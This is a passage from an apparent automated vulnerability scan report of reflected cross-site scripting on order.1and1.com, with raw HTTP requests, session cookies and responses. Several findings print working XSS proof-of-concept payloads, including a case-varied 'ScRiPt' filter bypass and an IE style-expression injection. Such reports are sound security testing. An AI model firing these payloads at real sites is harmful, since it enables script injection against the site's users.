This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureSite-buildingPhotogallery99bea</ScRiPt%20>57d930332ed;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:16 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 21:57:23 GMT; Path=/
ETag: 22783426aba0c8ad3815820a1b8c7156
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19319


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
ionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingPhotogallery";UNOUNO.params.lastpage="FeatureSite-buildingPhotogallery99bea</ScRiPt >57d930332ed";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.14. http://order.1and1.com/xml/order/FeatureSite-buildingWsb [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingWsb

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingWsb is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingWsb. The payload 8a254</ScRiPt%20>517ec0551f8 was submitted in the REST URL parameter 3. This input was returned as 8a254</ScRiPt >517ec0551f8 in a subsequent request for the URL /xml/order/FeatureSite-buildingWsb.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureSite-buildingWsb8a254</ScRiPt%20>517ec0551f8;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:42:19 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=IdGk5PD0zXFxcVmlfZixkXisdJ2BTZDxTRkAoLCkpKCYoJiMjJiUfIiYZGxowLVJAbGFjcSkrJlYvWWguISIeHSIeHDY0LjYtLDVtbjQpMGBpLyIjHx4jIB0gMjU2LzA=; Expires=Fri, 07-Apr-2079 21:56:27 GMT; Path=/
ETag: 64072c23e0b5d7c6b127c44390fcf074
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20609


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingWsb";UNOUNO.params.lastpage="FeatureSite-buildingWsb8a254</ScRiPt >517ec0551f8";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.15. http://order.1and1.com/xml/order/Gtc [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Gtc

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Gtc is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Gtc. The payload c5e5c</ScRiPt%20>78e706dc8a4 was submitted in the REST URL parameter 3. This input was returned as c5e5c</ScRiPt >78e706dc8a4 in a subsequent request for the URL /xml/order/Gtc.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Gtcc5e5c</ScRiPt%20>78e706dc8a4;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:37:13 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=cY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiMmISQlHh8=; Expires=Fri, 07-Apr-2079 21:51:20 GMT; Path=/
ETag: 293710f7dfa5ab5aebccd23aa4af1cf6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 119585


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
007652F99CC9FB631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Gtc";UNOUNO.params.lastpage="Gtcc5e5c</ScRiPt >78e706dc8a4";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.16. http://order.1and1.com/xml/order/Home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Home is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Home. The payload 92d59</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89b6bbee8d was submitted in the REST URL parameter 3. This input was returned as 92d59</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89b6bbee8d in a subsequent request for the URL /xml/order/Home.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Home92d59</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89b6bbee8d;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=

Request 2

GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:51:28 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTsuN2dwNikqJiUqJiQnJR8nHh0=; Expires=Fri, 07-Apr-2079 18:05:35 GMT; Path=/
ETag: 4aadadff388b28b120b90eb8b912244d
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36484


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
386BD5F5ED9C6322067094898.TCpfix140a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Home";UNOUNO.params.lastpage="Home92d59</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89b6bbee8d";UNOUNO.params.articles="0"};
   //-->
...[SNIP]...

1.17. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload 2a1d6</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>596a15d5308 was submitted in the REST URL parameter 3. This input was returned as 2a1d6</ScRiPt ><x style=x:expression(alert(1))>596a15d5308 in a subsequent request for the URL /xml/order/Hosting.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Hosting2a1d6</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>596a15d5308;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Request 2

GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:26:16 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:40:23 GMT; Path=/
ETag: dd55d9401d77d604366a27b67fe7cbe6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 60366


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
9CC9FB631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Hosting";UNOUNO.params.lastpage="Hosting2a1d6</ScRiPt ><x style=x:expression(alert(1))>596a15d5308";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.18. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload af2f1</ScRiPt%20>54b667825a6 was submitted in the REST URL parameter 3. This input was returned as af2f1</ScRiPt >54b667825a6 in a subsequent request for the URL /xml/order/Hosting.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Hostingaf2f1</ScRiPt%20>54b667825a6;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=5fd1c9683491b800; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDouNmZvNSgpJSQpJiMjJCYlICA=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:17:AAABLtRfOq9lEKaygDOb8n3tYyw*hvMn:1300643134127; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Request 2

GET /xml/order/Hosting;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A86282D009BBB115F77E4A430487B74D.TCpfix141a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=5fd1c9683491b800; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDouNmZvNSgpJSQpJiMjJCYlICA=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:17:AAABLtRfOq9lEKaygDOb8n3tYyw*hvMn:1300643134127; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:26:24 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
